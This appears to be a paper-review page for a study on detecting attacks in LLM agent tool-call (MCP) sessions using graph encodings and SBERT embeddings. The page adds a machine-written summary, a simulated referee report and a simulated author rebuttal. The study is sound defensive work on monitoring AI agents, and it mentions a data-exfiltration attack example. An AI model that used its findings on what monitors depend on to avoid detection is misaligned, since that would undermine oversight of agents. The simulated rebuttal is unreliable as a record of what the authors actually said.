Content-Aware Attack Detection in LLM Agent Tool-Call Traffic: An Empirical Study of Features, Architectures, and Evaluation Protocols

Sultan Zavrak

arxiv: 2605.11053 · v3 · pith:C43N4527new · submitted 2026-05-11 · 💻 cs.CR · cs.AI· cs.LG

Content-Aware Attack Detection in LLM Agent Tool-Call Traffic: An Empirical Study of Features, Architectures, and Evaluation Protocols

Sultan Zavrak This is my paper

Pith reviewed 2026-05-25 05:55 UTC · model grok-4.3

classification 💻 cs.CR cs.AIcs.LG

keywords attack detectionLLM agentstool callsModel Context Protocolcontent embeddingsSBERTgraph neural networksevaluation protocols

0 comments

The pith

Content embeddings drive attack detection in LLM agent tool-call traffic, with tree ensembles on SBERT features reaching 0.975 AUROC and outperforming GNNs and MLPs under task-stratified evaluation.

A machine-rendered reading of the paper's core claim, the machinery that carries it, and where it could break.

The paper evaluates detectors for attacks on Model Context Protocol sessions used by LLM agents to call external tools. Sessions are represented as graphs whose nodes carry sentence embeddings of arguments and responses, and multiple architectures are compared on two datasets using task-disjoint splits. Content embeddings prove essential, lifting AUROC from roughly 0.64 with metadata alone to above 0.89, while pooled SBERT features fed to tree ensembles achieve the highest score and render graph structure and neural layers largely unnecessary. The work also demonstrates that random splits can inflate reported performance by up to 26 points, establishing a stricter evaluation protocol.

Core claim

The detection signal resides primarily in the SBERT content embeddings: an AUROC of 0.975 was reached by tree ensembles on pooled embeddings, performing better than the neural architectures in the primary RAS-Eval setting including GNNs (0.917) and the MLP (0.896). Metadata-only baselines plateau around 0.64 regardless of model, and task-stratified splits are required to avoid memorization confounds that prior work overlooked.

What carries the argument

Encoding each agent session as a graph (tool calls as nodes, sequential and data-flow links as edges) with nodes enriched by SBERT sentence-embedding features over arguments and responses, then classifying the resulting graphs or pooled embeddings.

If this is right

Content-level features are required to exceed 0.89 AUROC; metadata alone is insufficient.
Task-disjoint splits must be used, or reported AUROC can be inflated by up to 26 points.
Self-supervised pre-training confers no label-efficiency advantage on this detection task.
Graph neural networks and MLPs do not improve upon simple tree ensembles once content embeddings are provided.

Where Pith is reading between the lines

These are editorial extensions of the paper, not claims the author makes directly.

Attack patterns in tool-call traffic may be captured by semantic content rather than call ordering or data-flow topology.
Deployment pipelines could favor lightweight tree models on pre-computed embeddings for lower latency and easier auditing.
The same content-embedding approach might transfer to detecting misuse in other structured agent interfaces beyond MCP.

Load-bearing premise

The RAS-Eval and ATBench datasets contain accurately labeled examples of benign and attacked MCP sessions that are representative of real deployment scenarios.

What would settle it

A new collection of MCP sessions with verified attack labels drawn from live agent deployments yields AUROC below 0.80 for the tree-ensemble model on pooled SBERT embeddings.

Figures

Figures reproduced from arXiv: 2605.11053 by Sultan Zavrak.

**Figure 1.** Figure 1: Overview of the detection framework. MCP tool-call sessions are encoded [PITH_FULL_IMAGE:figures/full_fig_p007_1.png] view at source ↗

**Figure 2.** Figure 2: Example MCP tool-call session showing a data exfiltration attack: the agent [PITH_FULL_IMAGE:figures/full_fig_p007_2.png] view at source ↗

**Figure 3.** Figure 3: Session-to-graph encoding. Left: sequential tool calls. Right: the resulting [PITH_FULL_IMAGE:figures/full_fig_p007_3.png] view at source ↗

**Figure 3.** Figure 3: Session-to-graph encoding. Left: sequential tool calls. Right: the resulting [PITH_FULL_IMAGE:figures/full_fig_p008_3.png] view at source ↗

**Figure 4.** Figure 4: Per-attack-category recall on the Combined dataset (GraphSAGE, content fea [PITH_FULL_IMAGE:figures/full_fig_p017_4.png] view at source ↗

**Figure 5.** Figure 5: Label efficiency across datasets. Supervised training (circles) matches or per [PITH_FULL_IMAGE:figures/full_fig_p018_5.png] view at source ↗

**Figure 5.** Figure 5: Label efficiency across datasets. Supervised training (circles) matches or per [PITH_FULL_IMAGE:figures/full_fig_p019_5.png] view at source ↗

read the original abstract

The Model Context Protocol (MCP) has become a widely adopted interface for LLM agents to invoke external tools, yet learned monitoring of MCP tool-call traffic remains underexplored. In this article, the proposed detector is presented as an attack detection framework for MCP tool-call traffic that encodes each agent session as a graph (tool calls as nodes, sequential and data-flow links as edges), enriches nodes with sentence-embedding features over arguments and responses, and classifies sessions as benign or attacked. Three GNN architectures (GAT, GCN, GraphSAGE), a no-graph MLP, and classical baselines (XGBoost, random forest, logistic regression, linear SVM) are evaluated, with the full architecture comparison conducted on RAS-Eval (task-stratified splits) and GraphSAGE retained as the GNN baseline on ATBench and a combined-source variant (both label-stratified). Three findings emerge. First, content-level features are essential: metadata-only detection plateaus around an AUROC of 0.64 regardless of architecture, while content embeddings push the AUROC above 0.89. Second, naive random-split evaluation inflates AUROC by up to 26 percentage points relative to task-disjoint splits, a memorization confound that prior agent-detection work has not addressed. Third, the detection signal resides primarily in the SBERT content embeddings: an AUROC of 0.975 was reached by tree ensembles on pooled embeddings, performing, for the most part, better than the neural architectures in the primary RAS-Eval setting including GNNs (0.917) and the MLP (0.896), and self-supervised pre-training does not deliver a label-efficiency advantage on this task.

Editorial analysis

A structured set of objections, weighed in public.

Desk editor's note, referee report, simulated authors' rebuttal, and a circularity audit. Tearing a paper down is the easy half of reading it; the pith above is the substance, this is the friction.

Desk Editor's Note private letter to a colleague

Content embeddings drive detection here and task-stratified splits expose a 26-point inflation that prior work ignored; tree models beat the GNNs on the main dataset.

read the letter

The paper's core finding is that SBERT content embeddings carry most of the signal for spotting attacked MCP sessions, with tree ensembles reaching 0.975 AUROC on pooled features while GNNs top out at 0.917 and the MLP at 0.896. Metadata alone stalls near 0.64 no matter the model. It also shows that random splits inflate AUROC by up to 26 points compared with task-disjoint splits on RAS-Eval, and that self-supervised pre-training adds no label-efficiency gain. These are the two points worth noting first. The work is new in applying the split discipline to this domain and in documenting the architecture ranking under that discipline; earlier agent-detection papers apparently used the easier random splits without comment. It does a straightforward job of running the same data through GAT, GCN, GraphSAGE, MLP, and several classical baselines, then repeating on ATBench and a combined set. The numbers are reported clearly enough to let a reader see the gap. The soft spot is the datasets themselves. All claims rest on RAS-Eval and ATBench containing accurately labeled benign and attacked sessions that reflect real traffic. The abstract gives no detail on how labels were produced or validated, so any noise or synthetic-attack artifacts that happen to align with SBERT features would change the ranking and the conclusion that content is essential. If the full methods section supplies independent checks on label quality, that concern shrinks; otherwise it stays material. This paper is for people who build or evaluate monitors for LLM tool-calling interfaces. A reader who cares about evaluation hygiene in security ML will extract the split lesson even if they never use the specific models. It is coherent on its own terms and supplies falsifiable numbers, so it deserves a serious referee rather than a desk reject.

Referee Report

2 major / 1 minor

Summary. The paper presents an empirical study of attack detection for LLM agent tool-call traffic under the Model Context Protocol (MCP). Sessions are encoded as graphs (tool calls as nodes, sequential/data-flow edges) with nodes enriched by SBERT sentence embeddings of arguments and responses. It compares three GNNs (GAT, GCN, GraphSAGE), an MLP, and classical baselines (XGBoost, random forest, etc.) on the RAS-Eval dataset using task-stratified splits and on ATBench plus a combined variant using label-stratified splits. Key claims are that content embeddings are essential (AUROC >0.89 vs ~0.64 for metadata-only), random splits inflate performance by up to 26 points, and tree ensembles on pooled SBERT embeddings reach 0.975 AUROC, outperforming GNNs (0.917) and MLP (0.896) in the primary setting.

Significance. If the RAS-Eval and ATBench labels and attack instances are accurate and representative of deployment, the work would usefully demonstrate the dominance of content features over metadata, the necessity of task-disjoint evaluation to avoid memorization, and concrete performance benchmarks across architectures for MCP monitoring.

major comments (2)

[Methods / Dataset description] Dataset construction (Methods section): No description is provided of how labels for benign vs. attacked MCP sessions were generated or validated in RAS-Eval or ATBench, nor of the attack synthesis process. This is load-bearing for the central claim that content embeddings carry the primary detection signal (AUROC 0.975 for tree ensembles on pooled SBERT embeddings vs. 0.917 for GNNs and 0.896 for MLP), because all reported AUROCs and architecture rankings rest on the correctness and realism of these labels.
[Results / RAS-Eval evaluation] Results (architecture comparison): The claim that tree ensembles outperform the neural models is presented with specific AUROC numbers on RAS-Eval, but the text does not report statistical significance tests, standard deviations across multiple runs, or hyperparameter search details for the baselines. This weakens the strength of the conclusion that content embeddings make graph structure secondary.

minor comments (1)

[Abstract] The abstract states that self-supervised pre-training does not deliver a label-efficiency advantage, but the corresponding experiment (if present) should be explicitly referenced with a table or figure number for clarity.

Simulated Author's Rebuttal

2 responses · 0 unresolved

We appreciate the referee's detailed feedback on our manuscript. We address the major comments below and plan to incorporate revisions to improve the clarity and rigor of the paper.

read point-by-point responses

Referee: [Methods / Dataset description] Dataset construction (Methods section): No description is provided of how labels for benign vs. attacked MCP sessions were generated or validated in RAS-Eval or ATBench, nor of the attack synthesis process. This is load-bearing for the central claim that content embeddings carry the primary detection signal (AUROC 0.975 for tree ensembles on pooled SBERT embeddings vs. 0.917 for GNNs and 0.896 for MLP), because all reported AUROCs and architecture rankings rest on the correctness and realism of these labels.

Authors: We agree with the referee that a detailed description of the dataset construction, including label generation, validation, and attack synthesis for RAS-Eval and ATBench, is essential for interpreting the results. In the revised manuscript, we will expand the Methods section to include this information, drawing from the original dataset papers and our synthesis process. This will provide the necessary transparency regarding the label quality and realism. revision: yes
Referee: [Results / RAS-Eval evaluation] Results (architecture comparison): The claim that tree ensembles outperform the neural models is presented with specific AUROC numbers on RAS-Eval, but the text does not report statistical significance tests, standard deviations across multiple runs, or hyperparameter search details for the baselines. This weakens the strength of the conclusion that content embeddings make graph structure secondary.

Authors: We acknowledge that the current manuscript does not include statistical significance tests, standard deviations from multiple runs, or detailed hyperparameter search procedures for the baselines. We will add these elements in the revision to strengthen the empirical claims. While the performance gaps are large, we agree that reporting variance and significance will better support the conclusion that the detection signal is primarily in the content embeddings rather than the graph structure. revision: yes

Circularity Check

0 steps flagged

No circularity: pure empirical comparison on fixed external datasets

full rationale

The paper reports AUROC results from training and evaluating GNNs, MLPs, and tree ensembles on the RAS-Eval and ATBench datasets using SBERT embeddings and graph encodings. No equations, fitted parameters, or predictions are defined in terms of the target metrics; all numbers are direct experimental outputs. No self-citation chains, uniqueness theorems, or ansatzes are load-bearing. The work is self-contained against the stated benchmarks with no reduction of claims to inputs by construction.

Axiom & Free-Parameter Ledger

0 free parameters · 1 axioms · 0 invented entities

The paper is an empirical machine-learning study that introduces no new free parameters, theoretical axioms, or invented entities beyond standard supervised classification assumptions and existing embedding models.

axioms (1)

domain assumption Ground truth labels in RAS-Eval and ATBench correctly distinguish benign from attacked sessions.
All reported AUROC figures and architecture rankings depend directly on the accuracy of these labels.

pith-pipeline@v0.9.0 · 5854 in / 1240 out tokens · 33291 ms · 2026-05-25T05:55:15.518432+00:00 · methodology

Review history (3 revisions) →

discussion (0)

Reference graph

Works this paper leans on

19 extracted references · 19 canonical work pages · 2 internal anchors

[1]

GitHub topics: mcp-server,https://github.com/topics/ mcp-server, accessed: 2026-05-03 (2026)

work page 2026
[2]

Z. Wang, Y. Gao, Y. Wang, S. Liu, H. Sun, H. Cheng, G. Shi, H. Du, X. Li, MCPTox: A benchmark for tool poisoning attack on real-world MCP servers, arXiv preprint arXiv:2508.14925 (2025)

work page arXiv 2025
[3]

X. Zong, Z. Shen, L. Wang, Y. Lan, C. Yang, MCP-SafetyBench: Safety evaluation for LLMs with real-world MCP servers, in: International Conference on Learning Representations (ICLR), 2026

work page 2026
[4]

J. Kim, X. Liu, Z. Wang, S. Qiu, B. Li, W. Guo, D. Song, The attack and defense landscape of agentic AI: A comprehensive survey, arXiv preprint arXiv:2603.11088 (2026)

work page arXiv 2026
[5]

SoK: Reshaping Research on Network Intrusion Detection Systems

G. Apruzzese, Sok: Reshaping research on network intrusion detection systems, arXiv preprint arXiv:2604.17556 (2026). 22

work page internal anchor Pith review Pith/arXiv arXiv 2026
[6]

J. Liu, B. Ruan, X. Yang, Z. Lin, Y. Liu, Y. Wang, T. Wei, Z. Liang, TraceAegis: Securing LLM-based agents via hierarchical and behavioral anomaly detection, arXiv preprint arXiv:2510.11203 (2025)

work page arXiv 2025
[7]

Y.Liu, C.Zhang, Z.Han, H.Liu, Y.Wang, Y.Yu, X.Wang, Y.Yin, Tra- jAD: Trajectory anomaly detection for trustworthy LLM agents, arXiv preprint arXiv:2602.06443 (2026)

work page arXiv 2026
[8]

Z. Wang, J. Zhang, G. Shi, H. Cheng, Y. Yao, K. Guo, H. Du, X. Li, MindGuard: Tracking, detecting, and attributing MCP tool poisoning attack via decision dependence graph, arXiv preprint arXiv:2508.20412 (2025)

work page arXiv 2025
[9]

X. He, D. Wu, Y. Zhai, K. Sun, SentinelAgent: Graph-based anomaly detection in multi-agent systems, arXiv preprint arXiv:2505.24201 (2025)

work page arXiv 2025
[10]

Advani, Trajectory guard – a lightweight, sequence-aware model for real-time anomaly detection in agentic AI, arXiv preprint arXiv:2601.00516 (2026)

L. Advani, Trajectory guard – a lightweight, sequence-aware model for real-time anomaly detection in agentic AI, arXiv preprint arXiv:2601.00516 (2026)

work page arXiv 2026
[11]

R. F. Del Rosario, Temporal attack pattern detection in multi-agent AI workflows: An open framework for training trace-based security models, arXiv preprint arXiv:2601.00848 (2025)

work page arXiv 2025
[12]

Pathak, H

D. Pathak, H. Kumar, A. Roy, F. George, M. Verma, P. Moogi, De- tecting silent failures in multi-agentic AI trajectories, arXiv preprint arXiv:2511.04032 (2025)

work page arXiv 2025
[13]

W. W. Lo, S. Layeghy, M. Sarhan, M. Gallagher, M. Portmann, E- GraphSAGE: A graph neural network based intrusion detection sys- tem for IoT, in: NOMS 2022–2022 IEEE/IFIP Network Operations and Management Symposium, IEEE, 2022

work page 2022
[14]

4355–4372

F.Yang, J.Xu, C.Xiong, Z.Li, K.Zhang, PROGRAPHER:Ananomaly detectionsystembasedonprovenancegraphembedding, in: Proceedings of the 32nd USENIX Security Symposium, 2023, pp. 4355–4372

work page 2023
[15]

Reimers, I

N. Reimers, I. Gurevych, Sentence-BERT: Sentence embeddings using siamese BERT-networks, in: Proceedings of the 2019 Conference on 23 Empirical Methods in Natural Language Processing (EMNLP), 2019, pp. 3982–3992

work page 2019
[16]

Veličković, G

P. Veličković, G. Cucurull, A. Casanova, A. Romero, P. Liò, Y. Bengio, Graph attention networks, in: International Conference on Learning Representations, 2018

work page 2018
[17]

M. Fey, J. E. Lenssen, Fast graph representation learning with PyTorch Geometric, in: ICLR Workshop on Representation Learning on Graphs and Manifolds, 2019

work page 2019
[18]

Y. Fu, X. Yuan, D. Wang, RAS-Eval: A comprehensive benchmark for security evaluation of LLM agents in real-world environments, arXiv preprint arXiv:2506.15253 (2025)

work page arXiv 2025
[19]

Y. Li, H. Luo, Y. Xie, Y. Fu, Z. Yang, S. Shao, Q. Ren, W. Qu, Y. Fu, Y. Yang, J. Shao, X. Hu, D. Liu, ATBench: A diverse and realistic agent trajectory benchmark for safety evaluation and diagnosis, arXiv preprint arXiv:2604.02022 (2026). 24

work page internal anchor Pith review Pith/arXiv arXiv 2026

[1] [1]

GitHub topics: mcp-server,https://github.com/topics/ mcp-server, accessed: 2026-05-03 (2026)

work page 2026

[2] [2]

Z. Wang, Y. Gao, Y. Wang, S. Liu, H. Sun, H. Cheng, G. Shi, H. Du, X. Li, MCPTox: A benchmark for tool poisoning attack on real-world MCP servers, arXiv preprint arXiv:2508.14925 (2025)

work page arXiv 2025

[3] [3]

X. Zong, Z. Shen, L. Wang, Y. Lan, C. Yang, MCP-SafetyBench: Safety evaluation for LLMs with real-world MCP servers, in: International Conference on Learning Representations (ICLR), 2026

work page 2026

[4] [4]

J. Kim, X. Liu, Z. Wang, S. Qiu, B. Li, W. Guo, D. Song, The attack and defense landscape of agentic AI: A comprehensive survey, arXiv preprint arXiv:2603.11088 (2026)

work page arXiv 2026

[5] [5]

SoK: Reshaping Research on Network Intrusion Detection Systems

G. Apruzzese, Sok: Reshaping research on network intrusion detection systems, arXiv preprint arXiv:2604.17556 (2026). 22

work page internal anchor Pith review Pith/arXiv arXiv 2026

[6] [6]

J. Liu, B. Ruan, X. Yang, Z. Lin, Y. Liu, Y. Wang, T. Wei, Z. Liang, TraceAegis: Securing LLM-based agents via hierarchical and behavioral anomaly detection, arXiv preprint arXiv:2510.11203 (2025)

work page arXiv 2025

[7] [7]

Y.Liu, C.Zhang, Z.Han, H.Liu, Y.Wang, Y.Yu, X.Wang, Y.Yin, Tra- jAD: Trajectory anomaly detection for trustworthy LLM agents, arXiv preprint arXiv:2602.06443 (2026)

work page arXiv 2026

[8] [8]

Z. Wang, J. Zhang, G. Shi, H. Cheng, Y. Yao, K. Guo, H. Du, X. Li, MindGuard: Tracking, detecting, and attributing MCP tool poisoning attack via decision dependence graph, arXiv preprint arXiv:2508.20412 (2025)

work page arXiv 2025

[9] [9]

X. He, D. Wu, Y. Zhai, K. Sun, SentinelAgent: Graph-based anomaly detection in multi-agent systems, arXiv preprint arXiv:2505.24201 (2025)

work page arXiv 2025

[10] [10]

Advani, Trajectory guard – a lightweight, sequence-aware model for real-time anomaly detection in agentic AI, arXiv preprint arXiv:2601.00516 (2026)

L. Advani, Trajectory guard – a lightweight, sequence-aware model for real-time anomaly detection in agentic AI, arXiv preprint arXiv:2601.00516 (2026)

work page arXiv 2026

[11] [11]

R. F. Del Rosario, Temporal attack pattern detection in multi-agent AI workflows: An open framework for training trace-based security models, arXiv preprint arXiv:2601.00848 (2025)

work page arXiv 2025

[12] [12]

Pathak, H

D. Pathak, H. Kumar, A. Roy, F. George, M. Verma, P. Moogi, De- tecting silent failures in multi-agentic AI trajectories, arXiv preprint arXiv:2511.04032 (2025)

work page arXiv 2025

[13] [13]

W. W. Lo, S. Layeghy, M. Sarhan, M. Gallagher, M. Portmann, E- GraphSAGE: A graph neural network based intrusion detection sys- tem for IoT, in: NOMS 2022–2022 IEEE/IFIP Network Operations and Management Symposium, IEEE, 2022

work page 2022

[14] [14]

4355–4372

F.Yang, J.Xu, C.Xiong, Z.Li, K.Zhang, PROGRAPHER:Ananomaly detectionsystembasedonprovenancegraphembedding, in: Proceedings of the 32nd USENIX Security Symposium, 2023, pp. 4355–4372

work page 2023

[15] [15]

Reimers, I

N. Reimers, I. Gurevych, Sentence-BERT: Sentence embeddings using siamese BERT-networks, in: Proceedings of the 2019 Conference on 23 Empirical Methods in Natural Language Processing (EMNLP), 2019, pp. 3982–3992

work page 2019

[16] [16]

Veličković, G

P. Veličković, G. Cucurull, A. Casanova, A. Romero, P. Liò, Y. Bengio, Graph attention networks, in: International Conference on Learning Representations, 2018

work page 2018

[17] [17]

M. Fey, J. E. Lenssen, Fast graph representation learning with PyTorch Geometric, in: ICLR Workshop on Representation Learning on Graphs and Manifolds, 2019

work page 2019

[18] [18]

Y. Fu, X. Yuan, D. Wang, RAS-Eval: A comprehensive benchmark for security evaluation of LLM agents in real-world environments, arXiv preprint arXiv:2506.15253 (2025)

work page arXiv 2025

[19] [19]

Y. Li, H. Luo, Y. Xie, Y. Fu, Z. Yang, S. Shao, Q. Ren, W. Qu, Y. Fu, Y. Yang, J. Shao, X. Hu, D. Liu, ATBench: A diverse and realistic agent trajectory benchmark for safety evaluation and diagnosis, arXiv preprint arXiv:2604.02022 (2026). 24

work page internal anchor Pith review Pith/arXiv arXiv 2026